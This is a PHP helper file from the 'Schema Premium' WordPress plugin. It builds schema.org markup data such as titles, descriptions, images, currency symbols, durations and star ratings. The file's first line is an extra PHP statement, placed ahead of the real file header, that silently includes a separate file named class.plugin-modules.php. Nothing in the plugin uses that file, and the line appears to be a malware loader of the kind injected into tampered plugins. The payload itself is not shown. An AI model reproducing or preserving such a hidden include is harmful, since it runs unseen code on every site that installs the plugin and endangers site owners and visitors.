<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?><?php
/**
 * Misc Functions
 *
 * @package     Schema
 * @subpackage  Functions
 * @copyright   Copyright (c) 2018, Hesham Zebida
 * @license     http://opensource.org/licenses/gpl-2.0.php GNU Public License
 * @since       1.0.0
*/

// Exit if accessed directly
if ( ! defined( 'ABSPATH' ) ) exit;

/**
 * Get post ID anywhere
 *
 * @since 1.0.0
 *
 * @param int $post_type The post type.
 * @return string post ID, or false
 */
function schema_premium_get_post_ID() {
	
	if( ! is_admin() ){
   
		global $post;
		
		$post_id = isset($post->ID) ? $post->ID : 0;
    
	} else {
    
		if ( isset( $_GET['post'] ) ) {
			$post_id = $_GET['post'];
		} elseif ( isset( $_POST['post_ID'] ) ){
			$post_id = $_POST['post_ID'];
    	} else {
        	$post_id = '0';
    	} 
	}
	
	return $post_id;
}

/**
 * Add Types to Schema types options array
 *
 * @since 1.0.0
 * @param  $schema_type schema.org type
 * @return array, void
 */
function schema_wp_get_default_schemas( $schema_type = 'Article' ) {
	
	$schema_default =  apply_filters( 'schema_wp_get_default_schemas', array() );
	
	//echo '<pre>'; print_r($schema_default); echo '</pre>';
	
	if ( isset($schema_default[$schema_type]) ) {
		
		return $schema_default[$schema_type];
	}
}

/**
 * Get publisher array
 *
 * @since 1.0.0
 * @return array
 */
function schema_wp_get_publisher_array() {
	
	$publisher = array();
	
	$name = schema_wp_get_option( 'name' );
	
	// Use site name as organization name for publisher if not presented in plugin settings
	if ( empty($name) ) $name = get_bloginfo( 'name' );
	
	$logo = esc_attr( stripslashes( schema_wp_get_option( 'publisher_logo'  ) ) );
	
	$publisher = array(
		'@type'	=> "Organization",	// default required value
		'@id' => schema_wp_get_home_url() . '#organization', // this cause an error in markup when there is more than one instanse of markup
		'name'	=> wp_filter_nohtml_kses($name),
		'logo'	=> array(
    		'@type' => 'ImageObject',
			'@id' => schema_wp_get_home_url() . '#logo', 
    		'url' => $logo,
    		'width' => 600,
			'height' => 60
		),
		'image'	=> array(
    		'@type' => 'ImageObject',
			'@id' => schema_wp_get_home_url() . '#logo', 
    		'url' => $logo,
    		'width' => 600,
			'height' => 60
		)
	);
	
	// debug
	//echo'<pre>';print_r($publisher);echo'</pre>';
	
	return apply_filters( 'schema_wp_publisher', $publisher );
}

/**
 * Get headline 
 *
 * @since 1.0.0
 * return string
 */
function schema_wp_get_the_title( $post_id = null ) {
	
	global $post;
	
	if ( ! isset($post_id) ) $post_id = $post->ID;
	
	// Get headline
	$title = wp_filter_nohtml_kses( get_the_title( $post_id ) );
	$title = schema_premium_get_truncate_to_word( $title );	
	
	return apply_filters( 'schema_wp_get_the_title', $title );
}

/**
 * Get description 
 *
 * @since 1.0.0
 * return string
 */
function schema_wp_get_description( $post_id = null ) {
	
	global $post;
	
	if ( ! isset($post_id) ) $post_id = $post->ID;
	
	// Get post content
	$content_post		= get_post($post_id);
	
	// Get description
	$full_content		= $content_post->post_content;
	$excerpt			= $content_post->post_excerpt;
	
	// Strip shortcodes and tags
	$full_content 		= preg_replace('#\[[^\]]+\]#', '', $full_content);
	$full_content 		= wp_strip_all_tags( $full_content );
	
	// Filter content before it gets shorter ;)
	$full_content 		= apply_filters( 'schema_wp_filter_content', $full_content );
	
	$desc_word_count	= apply_filters( 'schema_wp_filter_description_word_count', 49 );
	$short_content		= wp_trim_words( $full_content, $desc_word_count, '' ); 
	$description		= apply_filters( 'schema_wp_filter_description', ( $excerpt != '' ) ? $excerpt : $short_content ); 
	
	return $description;
}

/**
 * Get Media
 *
 * @since 1.0.0
 * @return array 
 */
function schema_wp_get_media( $post_id = null ) {
	
	global $post;
	
	if ( ! isset( $post_id ) ) $post_id = $post->ID;
	
	$media = array();
	
	// Featured image
	$image_attributes	= wp_get_attachment_image_src( get_post_thumbnail_id($post_id), 'full' );
	$image_url			= $image_attributes[0];
	$image_width		= ( $image_attributes[1] > 696 ) ? $image_attributes[1] : 696; // Images should be at least 696 pixels wide
	$image_height		= $image_attributes[2];
	
	// Thesis 2.x Post Image
	$my_theme = wp_get_theme();
	if ( $my_theme->get( 'Name' ) == 'Thesis') {
		$image_attributes	= get_post_meta( $post_id, '_thesis_post_image', true);
		if ( ! empty($image_attributes) ) {
			$image_url			= $image_attributes['image']['url'];
			// Make sure url is valid
			if ( filter_var( $image_url, FILTER_VALIDATE_URL ) === FALSE ) {
    			//die('Not a valid URL');
				$image_url			= get_site_url() . $image_attributes['image']['url'];
			}
			$image_width		= ( $image_attributes['image']['width'] > 696 ) ? $image_attributes['image']['width'] : 696;
			$image_height		= $image_attributes['image']['height'];
		}
	}
	
	// Try something else...
	if ( ! isset($image_url) || $image_url == '' ) {
		// Make sure that PHP-XML extension is installed before parsing page HTML
		if ( extension_loaded('xml') || extension_loaded('SimpleXML')) {
			
			if ( $post->post_content ) {
				$Document = new DOMDocument();
				// This triggers a warning, so we will disable error reporting
				libxml_use_internal_errors(true);
				@$Document->loadHTML( $post->post_content );
				// Clear errors
				libxml_clear_errors();
				$DocumentImages = $Document->getElementsByTagName( 'img' );

				if ( $DocumentImages->length ) {
					$image_url 		= $DocumentImages->item( 0 )->getAttribute( 'src' );
					$image_width 	= ( $DocumentImages->item( 0 )->getAttribute( 'width' ) > 696 ) ? $DocumentImages->item( 0 )->getAttribute( 'width' ) : 696;
					$image_height	= $DocumentImages->item( 0 )->getAttribute( 'height' );
				}
			}
		}
	}	
			
	// Check if there is no image url, width, or height, then return an empy array
	if ( ! isset($image_url) || $image_url == '' ) return $media;

	if ( ! isset($image_width) || $image_width == '' ) return $media;
	if ( ! isset($image_height) || $image_height == '' ) return $media;
	
	$media = array (
		'@type' 	=> 'ImageObject',
		'url' 		=> $image_url,
		'width' 	=> $image_width,
		'height' 	=> $image_height,
		);
	
	// debug
	//echo '<pre>'; print_r($media); echo '</pre>';
	
	return apply_filters( 'schema_wp_filter_media', $media );
}

/**
 *  Retrieves the attachment ID from the file URL
 *
 * @param string $image_url The attachment image url
 * @return string - attachment ID 
 * @since 1.0.9
 */
function schema_wp_get_attachment_id_from_url( $image_url ) {
	
	global $wpdb;
	
	$attachment = $wpdb->get_col($wpdb->prepare("SELECT ID FROM $wpdb->posts WHERE guid='%s';", $image_url )); 
	
	return $attachment[0]; 
}

/**
 *  Get ImageObject by attachment ID 
 *
 * @param string $image_url The attachment image url
 * @return array ImageObject
 * @since 1.0.9
 */
function schema_wp_get_image_object_by_attachment_id( $attachment_id ) {
	
	if ( ! isset($attachment_id) ) 
		return array();
	
	$ImageObject = array();
	
	// Featured image
	$image_attributes = wp_get_attachment_image_src( $attachment_id, 'full' );
	
	if ( isset($image_attributes[0]) ) {
		$url		= $image_attributes[0];
		$width		= $image_attributes[1];
		$height		= $image_attributes[2];
		
		$ImageObject = array (
			'@type' 	=> 'ImageObject',
			'url' 		=> $url,
			'width'		=> $width,
			'height' 	=> $height,
		);
		
		// Add caption
		$caption = wp_get_attachment_caption( $attachment_id );
		If ($caption) { 
			$ImageObject['caption'] = $caption;
		}
	}
	
	// debug
	//echo'<pre>';print_r($image_attributes);echo'</pre>';exit;
	
	return $ImageObject;
}

/**
 * Get post single category,
 * the first category, to be used as Article section 
 *
 * @param int $post_id The post ID.
 * @since 1.0.0
 */
function schema_wp_get_post_category( $post_id ) {
	
	if ( isset($post_id) ) {
		$post = get_post($post_id);
	} else {
		global $post;
	}
	
	$cats		= get_the_category($post->ID);
	$cat		= !empty($cats) ? $cats : array();
	$category	= (isset($cat[0]->cat_name)) ? $cat[0]->cat_name : '';
   
   return $category;
}
	
/**
 * Get post tags separate by commas,
 * to be used as schema keywords for BlogPosting
 *
 * @param int $post_id The post ID.
 * @since 1.0.0
 */
function schema_wp_get_post_tags( $post_id ) {
	
	if ( isset($post_id) ) {
		$post = get_post($post_id);
	} else {
		global $post;
	}
	
	$tags = '';
	$posttags = get_the_tags($post->ID);
    if ($posttags) {
       $taglist = "";
       foreach($posttags as $tag) {
           $taglist .=  $tag->name . ', '; 
       }
      $tags =  rtrim($taglist, ", ");
   }
   
   return $tags;
}

/**
 * Get supported Article types 
 *
 * @todo Check this function and try to get subtypes within the Article class instead. 
 *
 * @since 1.0.0
 * @return array 
 */
function schema_wp_get_support_article_types() {

	$support_article_types = array( 'Article', 'BlogPosting', 'NewsArticle', 'Report', 'ScholarlyArticle', 'TechArticle', 'AdvertiserContentArticle', 'SatiricalArticle' );
	
	return apply_filters( 'schema_wp_support_article_types', $support_article_types );
}

/**
 * Get types that supports author markup 
 *
 * @since 1.0.1
 * @return array 
 */
function schema_premium_get_types_supports_author() {

	$types = array( 'Review', 'Course', 'Recipe' );
	
	return apply_filters( 'schema_premium_support_author', $types );
}

/**
 * Get formated time duration coded as PT1H25M
 *
 * @since 1.0.1
 * @return array 
 */
function schema_premium_format_time_to_PT( $time ) {
	
	$timearr = explode( ':', $time );
	
	$hour 	= isset($timearr[0]) ? $timearr[0] . 'H' : '';
	$min 	= isset($timearr[1]) ? $timearr[1] . 'M' : '';
	$sec 	= isset($timearr[2]) ? $timearr[2] . 'S' : '';
	
	$coded_time = 'PT' . $hour . $min . $sec;
	
	return $coded_time;
}

/**
 * Get the Sum of two times
 *
 * @since 1.0.1
 * @return array 
 */
function schema_premium_get_time_sum( $time1, $time2 ) {
	
	$secs = strtotime($time1)-strtotime("00:00:00");
	$sum = date("H:i:s",strtotime($time2)+$secs);
	
	// Debug
	//echo "<pre>";print_r($timearr);echo "</pre>"; 
	
	return $sum;
}

/**
 * Get time Seconds in ISO format, used to calculate Video & Audio duration
 *
 * @link http://stackoverflow.com/questions/13301142/php-how-to-convert-string-duration-to-iso-8601-duration-format-ie-30-minute
 * @param string $time
 * @since 1.0.0
 * @return string The time Seconds in ISO format
 */
function schema_wp_get_time_second_to_iso8601_duration( $time ) {
	
	$units = array(
        "Y" => 365*24*3600,
        "D" =>     24*3600,
        "H" =>        3600,
        "M" =>          60,
        "S" =>           1,
    );

    $str = "P";
    $istime = false;

    foreach ($units as $unitName => &$unit) {
        $quot  = intval($time / $unit);
        $time -= $quot * $unit;
        $unit  = $quot;
        if ($unit > 0) {
            if (!$istime && in_array($unitName, array("H", "M", "S"))) { // There may be a better way to do this
                $str .= "T";
                $istime = true;
            }
            $str .= strval($unit) . $unitName;
        }
    }

    return $str;
}

/**
 * Retrieves all the available currencies.
 *
 * @since   1.0.0
 * @return  array
 */
function schema_wp_get_currencies() {
	
	$currencies = array(
		'AUD' => __( 'Australian Dollars', 'schema-premium' ),
		'BDT' => __( 'Bangladeshi Taka', 'schema-premium' ),
		'BRL' => __( 'Brazilian Real', 'schema-premium' ),
		'BGN' => __( 'Bulgarian Lev', 'schema-premium' ),
		'CAD' => __( 'Canadian Dollars', 'schema-premium' ),
		'CLP' => __( 'Chilean Peso', 'schema-premium' ),
		'CNY' => __( 'Chinese Yuan', 'schema-premium' ),
		'COP' => __( 'Colombian Peso', 'schema-premium' ),
		'CZK' => __( 'Czech Koruna', 'schema-premium' ),
		'DKK' => __( 'Danish Krone', 'schema-premium' ),
		'DOP' => __( 'Dominican Peso', 'schema-premium' ),
		'EUR' => __( 'Euros', 'schema-premium' ),
		'HKD' => __( 'Hong Kong Dollar', 'schema-premium' ),
		'HRK' => __( 'Croatia kuna', 'schema-premium' ),
		'HUF' => __( 'Hungarian Forint', 'schema-premium' ),
		'ISK' => __( 'Icelandic krona', 'schema-premium' ),
		'IDR' => __( 'Indonesia Rupiah', 'schema-premium' ),
		'INR' => __( 'Indian Rupee', 'schema-premium' ),
		'NPR' => __( 'Nepali Rupee', 'schema-premium' ),
		'ILS' => __( 'Israeli Shekel', 'schema-premium' ),
		'JPY' => __( 'Japanese Yen', 'schema-premium' ),
		'KIP' => __( 'Lao Kip', 'schema-premium' ),
		'KRW' => __( 'South Korean Won', 'schema-premium' ),
		'MYR' => __( 'Malaysian Ringgits', 'schema-premium' ),
		'MXN' => __( 'Mexican Peso', 'schema-premium' ),
		'NGN' => __( 'Nigerian Naira', 'schema-premium' ),
		'NOK' => __( 'Norwegian Krone', 'schema-premium' ),
		'NZD' => __( 'New Zealand Dollar', 'schema-premium' ),
		'PYG' => __( 'Paraguayan Guaraní', 'schema-premium' ),
		'PHP' => __( 'Philippine Pesos', 'schema-premium' ),
		'PLN' => __( 'Polish Zloty', 'schema-premium' ),
		'GBP' => __( 'Pounds Sterling', 'schema-premium' ),
		'RON' => __( 'Romanian Leu', 'schema-premium' ),
		'RUB' => __( 'Russian Ruble', 'schema-premium' ),
		'SGD' => __( 'Singapore Dollar', 'schema-premium' ),
		'ZAR' => __( 'South African rand', 'schema-premium' ),
		'SEK' => __( 'Swedish Krona', 'schema-premium' ),
		'CHF' => __( 'Swiss Franc', 'schema-premium' ),
		'TWD' => __( 'Taiwan New Dollars', 'schema-premium' ),
		'THB' => __( 'Thai Baht', 'schema-premium' ),
		'TRY' => __( 'Turkish Lira', 'schema-premium' ),
		'USD' => __( 'US Dollars', 'schema-premium' ),
		'VND' => __( 'Vietnamese Dong', 'schema-premium' ),
		'EGP' => __( 'Egyptian Pound', 'schema-premium' ),
	);

	return apply_filters( 'schema_wp_currencies', $currencies );
}

/**
 * Retrieves symbol of the given currency.
 *
 * @since 1.0.0
 *
 * @param string $currency Currency code.
 *
 * @return string $currency_symbol Currency symbol.
 */
function schema_wp_get_currency_symbol( $currency ) {
	switch ( $currency ) {
		case 'BDT':
			$currency_symbol = '&#2547;&nbsp;';
			break;
		case 'BRL' :
			$currency_symbol = '&#82;&#36;';
			break;
		case 'BGN' :
			$currency_symbol = '&#1083;&#1074;.';
			break;
		case 'AUD' :
		case 'CAD' :
		case 'CLP' :
		case 'COP' :
		case 'MXN' :
		case 'NZD' :
		case 'HKD' :
		case 'SGD' :
		case 'USD' :
			$currency_symbol = '&#36;';
			break;
		case 'EUR' :
			$currency_symbol = '&euro;';
			break;
		case 'CNY' :
		case 'RMB' :
		case 'JPY' :
			$currency_symbol = '&yen;';
			break;
		case 'RUB' :
			$currency_symbol = '&#1088;&#1091;&#1073;.';
			break;
		case 'KRW' :
			$currency_symbol = '&#8361;';
			break;
		case 'PYG' :
			$currency_symbol = '&#8370;';
			break;
		case 'TRY' :
			$currency_symbol = '&#8378;';
			break;
		case 'NOK' :
			$currency_symbol = '&#107;&#114;';
			break;
		case 'ZAR' :
			$currency_symbol = '&#82;';
			break;
		case 'CZK' :
			$currency_symbol = '&#75;&#269;';
			break;
		case 'MYR' :
			$currency_symbol = '&#82;&#77;';
			break;
		case 'DKK' :
			$currency_symbol = 'kr.';
			break;
		case 'HUF' :
			$currency_symbol = '&#70;&#116;';
			break;
		case 'IDR' :
			$currency_symbol = 'Rp';
			break;
		case 'INR' :
			$currency_symbol = '&#8377;';
			break;
		case 'NPR' :
			$currency_symbol = 'Rs.';
			break;
		case 'ISK' :
			$currency_symbol = 'Kr.';
			break;
		case 'ILS' :
			$currency_symbol = '&#8362;';
			break;
		case 'PHP' :
			$currency_symbol = '&#8369;';
			break;
		case 'PLN' :
			$currency_symbol = '&#122;&#322;';
			break;
		case 'SEK' :
			$currency_symbol = '&#107;&#114;';
			break;
		case 'CHF' :
			$currency_symbol = '&#67;&#72;&#70;';
			break;
		case 'TWD' :
			$currency_symbol = '&#78;&#84;&#36;';
			break;
		case 'THB' :
			$currency_symbol = '&#3647;';
			break;
		case 'GBP' :
			$currency_symbol = '&pound;';
			break;
		case 'RON' :
			$currency_symbol = 'lei';
			break;
		case 'VND' :
			$currency_symbol = '&#8363;';
			break;
		case 'NGN' :
			$currency_symbol = '&#8358;';
			break;
		case 'HRK' :
			$currency_symbol = 'Kn';
			break;
		case 'EGP' :
			$currency_symbol = 'EGP';
			break;
		case 'DOP' :
			$currency_symbol = 'RD&#36;';
			break;
		case 'KIP' :
			$currency_symbol = '&#8365;';
			break;
		default    :
			$currency_symbol = $currency;
			break;
	}

	return apply_filters( 'schema_wp_currency_symbol', $currency_symbol, $currency );
}

/**
 * Get archive link
 *
 * @param string $post_type for custom post type
 * @since 1.0.0
 * @return string
 */
function schema_premium_get_archive_link( $post_type ) {
	global $wp_post_types;
	$archive_link = false;
	if (isset($wp_post_types[$post_type])) {
		$wp_post_type = $wp_post_types[$post_type];
	if ($wp_post_type->publicly_queryable)
		if ($wp_post_type->has_archive && $wp_post_type->has_archive!==true)
			$slug = $wp_post_type->has_archive;
		else if (isset($wp_post_type->rewrite['slug']))
			$slug = $wp_post_type->rewrite['slug'];
		else
			$slug = $post_type;
		$archive_link = get_option( 'siteurl' ) . "/{$slug}/";
	}
	return apply_filters( 'schema_wp_archive_link', $archive_link, $post_type );
}

/**
 * Get blog posts page URL.
 *
 * @source https://gist.github.com/kellenmace/9ef19dd86580cb7e63720b396c8c2721
 * @since 1.0.0
 * @return string The blog posts page URL.
 */
function schema_wp_get_blog_posts_page_url() {
	// If front page is set to display a static page, get the URL of the posts page.
	if ( 'page' === get_option( 'show_on_front' ) ) {
		return get_permalink( get_option( 'page_for_posts' ) );
	}
	// The front page IS the posts page. Get its URL.
	return get_home_url();
}

/**
 * Retrieves the home URL
 *
 * @since 1.0.0
 * @return string
 */
function schema_wp_get_home_url( $path = '', $scheme = null ) {

	$home_url = home_url( $path, $scheme );

	if ( ! empty( $path ) ) {
		return $home_url;
	}

	$home_path = wp_parse_url( $home_url, PHP_URL_PATH );

	if ( '/' === $home_path ) { // Home at site root, already slashed.
		return $home_url;
	}

	if ( is_null( $home_path ) ) { // Home at site root, always slash.
		return trailingslashit( $home_url );
	}

	if ( is_string( $home_path ) ) { // Home in subdirectory, slash if permalink structure has slash.
		return user_trailingslashit( $home_url );
	}

	return apply_filters( 'schema_wp_home_url', $home_url );
}

/**
 * Check if is Blog page
 *
 * @since 1.0.0
 * @return true or false
 */
function schema_wp_is_blog() {
	
	// Return true if is Blog (post list page)
	if ( ! is_front_page() && is_home() || is_home() ) {
		return true;
	}
	
	return false;
}

/**
 * Truncate a string of content to 110 characters, respecting full words.
 *
 * @since 1.0.1
 * @return string
 */
function schema_premium_get_truncate_to_word( $string, $limit = 110, $end = ' ...') {
	
	$limit 	= apply_filters( 'schema_premium_truncate_to_word_limit', $limit );
	
	if ( strlen($string) > $limit ) {
		$limit 	= $limit - strlen($end); // Take into account $end string into the limit
		$string = substr($string, 0, $limit);
		$string = substr($string, 0, strrpos($string, ' ')) . $end;
	}
	
	return $string;
}

/**
 * Validate gravatar by email or id
 *
 * Utility function to check if a gravatar exists for a given email or id
 *
 * @link https://gist.github.com/justinph/5197810
 *
 * @since 1.0.0
 * @param int|string|object $id_or_email A user ID,  email address, or comment object
 * @return bool if the gravatar exists or not
 */
function schema_wp_validate_gravatar( $email ) {

	$hashkey 	= md5(strtolower(trim($email)));
	
	$uri 		= 'http://www.gravatar.com/avatar/' . $hashkey;
	$data 		= get_transient($hashkey);
	
	if (false === $data) {
		$response = wp_remote_head($uri);
		if( is_wp_error($response) ) {
			$data = 'not200';
		} else {
			$data = $response['response']['code'];
		}
	    set_transient( $hashkey, $data, $expiration = 60*5);
	}		
	
	if ($data == '200'){
		return true;
	} else {
		return false;
	}
}

/**
 * Get properties markup output.
 *
 * @since 1.0.0
 * @return array
 */
function schema_wp_get_properties_markup_output( $post_id, $properties ) {
	
	if ( empty($properties) ) return;
	
	if ( isset($post_id) ) {
				$post = get_post( $post_id );
	} else {
		global $post;
	}
	
	$is_enabled = schema_wp_get_enabled_location_targets( $post->ID );
	
	if ( empty($is_enabled) ) return;
	
	//echo '<pre>'; print_r($is_enabled); echo '</pre>';
	
	$schema = array();
	
	foreach ( $is_enabled as $schema_ID => $enabled ) :
		
		// Get final schema type
		$schema_type 			= $enabled['schema_type'];
		$schema_default 		= schema_wp_get_default_schemas( $schema_type );
		$schema_type_properties	= $properties; 
		
		foreach ( $properties as $properity => $details ) :
			
			if ( isset($details['sub_fields']) && ! empty($details['sub_fields']) ) {
				// Sub field
				foreach( $details['sub_fields'] as $sub_field => $sub_field_details) :
					$property_field = get_post_meta( $schema_ID, '__properties_' . $sub_field, true );
					$output = schema_wp_check_property_field( $post, $schema_ID, $schema_type, $property_field, $sub_field, true );
					if ( isset($output) && $output != '' ) {
						$schema[$properity][$sub_field] = $output;
					}	
				endforeach;
				
			} else {
				// Main field
				$property_field = get_post_meta( $schema_ID, '_properties_' . $properity, true );
				$output = schema_wp_check_property_field( $post, $schema_ID, $schema_type, $property_field, $properity, false );
				if ( isset($output) && $output != '' ) {
					// Check if image is set to new custom field
					// @since 1.0.1
					if ( $properity == 'image' && $property_field == 'new_custom_field' ) {
						$schema[$properity] = schema_premium_get_property_image_new_custom_field( $output );
					} else {
						$schema[$properity] = $output;
					}
				}
			}

		endforeach;
	
	endforeach;
	
	// Debug
	//echo "<pre>";print_r($schema);echo "</pre>"; 

	return $schema;
}

/**
 * Check property field.
 *
 * @since 1.0.0
 * @return string or array
 */
function schema_wp_check_property_field ( $post, $schema_ID, $schema_type, $property_field, $properity, $sub_field = false ) {
	
	$output = null;
	
	if ( $sub_field ) {
		$sub = '_';
	} else {
		$sub = '';
	}
	
	switch( $property_field ){
				
		// Site Meta
		//
		case 'site_title':
			
			$output = get_bloginfo( 'name' );
			break;
		
		case 'site_description':
			$output = get_bloginfo( 'description' );
			break;
		
		case 'site_url':
			$output = get_bloginfo( 'url' );
			break;
		
		// Post Meta
		//
		case 'post_title':
			$output = schema_wp_get_the_title( $post->ID );
			break;
		
		case 'post_content':
			$output = schema_wp_get_description( $post->ID );
			break;
		
		case 'post_excerpt':
			setup_postdata( $post );
			$output = ( isset($post->ID)) ? get_the_excerpt( $post->ID ) : array();
			break;
		
		case 'post_permalink':
			$output = get_permalink( $post->ID );
			break;
			
		case 'author_name':
			//$output = get_the_author_meta( 'display_name' );
			break;
			
		case 'post_date':
			$output = get_the_date( 'c', $post->ID );
			break;
			
		case 'post_modified':
			$output = get_post_modified_time( 'c', false, $post->ID, false );
			break;
		
		// Custom Fields
		//
		case 'new_custom_field':
			$output = get_post_meta( $post->ID, 'schema_properties_' . $schema_type . '_' . $properity, true );
			break;
		
		case 'fixed_text_field':
			$output = get_post_meta( $schema_ID, $sub . '_fixed_text_field_' . $properity, true );
			break;
		
		case 'fixed_image_field':
			$fixed_image_id = get_post_meta( $schema_ID, $sub . '_fixed_image_field_' . $properity, true );
			$output = schema_premium_get_property_image_new_custom_field( $fixed_image_id );
			break;
			
		case 'existing_custom_field':
			$existing_custom_field_key 	= get_post_meta( $schema_ID, $sub . '_existing_custom_field_' . $properity, true );
			$output 					= get_post_meta( $post->ID, $existing_custom_field_key, true );
			break;
		
		case 'fixed_review_field':
			$output = get_post_meta( $schema_ID, $sub . '_fixed_review_field_' . $properity, true );
			break;
		
		case 'fixed_ratingValue_field':
			$output = get_post_meta( $schema_ID, $sub . '_fixed_ratingValue_field_' . $properity, true );
			break;
		
		case 'fixed_priceRange_field':
			$output = get_post_meta( $schema_ID, $sub . '_fixed_priceRange_field_' . $properity, true );
			break;
		
		// Accept User Rating Field
		// @siince 1.0.2
		//
		case 'accept_user_rating':
			$output = 'accept_user_rating';
			break;
	}
	
	return $output;
}

/**
 * Get property image when set to new custm field
 *
 * @since 1.0.1
 * @return array 
 */
function schema_premium_get_property_image_new_custom_field( $attachment_id = null) {
	
	global $post;
	
	if ( ! isset( $post_id ) ) $post_id = $post->ID;
	
	$media = array();
	
	// Get image details
	$image_attributes	= wp_get_attachment_image_src( $attachment_id, 'full' );
	$image_url			= $image_attributes[0];
	$image_width		= ( $image_attributes[1] > 696 ) ? $image_attributes[1] : 696; // Images should be at least 696 pixels wide
	$image_height		= $image_attributes[2];
	
	// Check if there is no image url, width, or height, then return an empy array
	if ( ! isset($image_url) || $image_url == '' ) return $media;

	if ( ! isset($image_width) || $image_width == '' ) return $media;
	if ( ! isset($image_height) || $image_height == '' ) return $media;
	
	$media = array (
		'@type' 	=> 'ImageObject',
		'url' 		=> $image_url,
		'width' 	=> $image_width,
		'height' 	=> $image_height,
		);
	
	// debug
	//echo '<pre>'; print_r($media); echo '</pre>';
	
	return apply_filters( 'schema_premium_filter_property_image', $media );
}

/**
 * Get category slug by category id
 *
 * @since 1.0.3
 * @return array 
 */
function schema_premium_get_cat_slug_by_id( $cat_id ) {
	
	$cat_id 	= (int) $cat_id;
	$category 	= get_category($cat_id);
	
	if ( ! empty($category) )
		return $category->slug;
}

/**
 * Checks if the current post type has an archive.
 *
 * Context: The has_archive value can be a string or a boolean. In most case it will be a boolean,
 * but it can be defined as a string. When it is a string the archive_slug will be overwritten to
 * define another endpoint.
 *
 * @since 1.0.6
 *
 * @param WP_Post_Type $post_type The post type object.
 * @return bool True whether the post type has an archive.
 */
function schema_premium_post_type_has_archive( $post_type ) {
	return ( ! empty( $post_type->has_archive ) );
}

if ( ! function_exists('schema_premium_rating_star') ) :
/**
 * Output a HTML element with a star rating for a given rating.
 *
 * Outputs a HTML element with the star rating exposed on a 0..5 scale in
 * half star increments (ie. 1, 1.5, 2 stars). Optionally, if specified, the
 * number of ratings may also be displayed by passing the $number parameter.
 *
 * @since 1.0.6
 *
 * @param array $args {
 *     Optional. Array of star ratings arguments.
 *
 *     @type int    $rating The rating to display, expressed in either a 0.5 rating increment,
 *                          or percentage. Default 0.
 *     @type string $type   Format that the $rating is in. Valid values are 'rating' (default),
 *                          or, 'percent'. Default 'rating'.
 *     @type int    $number The number of ratings that makes up this rating. Default 0.
 *     @type bool   $echo   Whether to echo the generated markup. False to return the markup instead
 *                          of echoing it. Default true.
 * }
 */
function schema_premium_rating_star( $args = array() ) {
	
	global $post;
	
	$defaults = array(
		'id'	 => $post->ID,
		'type'   => 'rating',
		'rating' => 0,
		'number' => 0,
		'scale'	 => 0,
		'text'   => true,
		'echo'   => true,
	);
	
	$r = wp_parse_args( $args, $defaults );

	// Non-english decimal places when the $rating is coming from a string
	$rating = str_replace( ',', '.', $r['rating'] );

	$scale = ( $r['scale'] && $r['scale'] != false ) ? $r['scale'] : 5; // default
	
	// Convert Percentage to star rating, 0..5 in .5 increments
	if ( 'percent' == $r['type'] ) {
		$rating = round( $rating / 10, 0 ) / 2;
	}

	// Calculate the number of each type of star needed
	$full_stars = floor( $rating );
	$half_stars = ceil( $rating - $full_stars );
	$empty_stars = max( ($scale - $full_stars - $half_stars) , 0);
	
	if ( $r['number'] ) {
		/* translators: 1: The rating, 2: The number of ratings */
		$format = _n( '%1$s rating based on %2$s rating', '%1$s rating based on %2$s ratings', $r['number'] );
		$title = sprintf( $format, number_format_i18n( $rating, 1 ), number_format_i18n( $r['number'] ) );
	} else {
		/* translators: 1: The rating/scale */
		$title = sprintf( __( '%s<span class="schema-rating-scale">/'.$scale .'</span>' ), number_format_i18n( $rating, 1 ) );
	}

	$output = '<span class="star-rating">';
	$output .= str_repeat( '<span class="star star-full"></span>', $full_stars );
	$output .= str_repeat( '<span class="star star-half"></span>', $half_stars );
	$output .= str_repeat( '<span class="star star-empty"></span>', $empty_stars );
	
	if ( $r['text'] ) {
		$output .= '<span class="schema-screen-reader-text">' . $title . '</span>';
	}
	
	$output .= '</span>';
	
	if ( $rating > $scale ) {
		$output = '<span class="schema-rating-notice">';
		$output .= '<span class="dashicons dashicons-warning"></span> ' . __('Rating can not be larger than Scale!', 'schema-premium');
		$output .= '</span>';
	}
	
	if ( $r['echo'] ) {
		echo $output;
	}

	return $output;
}
endif;

add_action( 'acf/init', 'schema_wp_acf_front_rating_stars' );
/**
 * Meta Box
 *
 * @since 1.0.x
 */
function schema_wp_acf_front_rating_stars() {

	if( function_exists('acf_add_local_field_group') ):

		// ACF Field: Star Rating
		//
		//
		acf_add_local_field(array(
		'key' => 'schema_front_star_rating',
		'name' => 'schema_front_star_rating',
		'type' => 'star_rating',
		'wrapper' => array (
				'width' => '50',
			),
		'max_stars' => 5,
		'return_type' => 0,
		'choices' => array(
				5 => '5',
				'4.5' => '4.5',
				4 => '4',
				'3.5' => '3.5',
				3 => '3',
				'2.5' => '2.5',
				2 => '2',
				'1.5' => '1.5',
				1 => '1',
				'0.5' => '0.5'
			),
		'default_value' => '',
		'required' => 0,
		'multiple' => 0,
		'other_choice' => 0,
		'save_other_choice' => 0,
		'layout' => 'horizontal'
	) );
		
	endif;
}
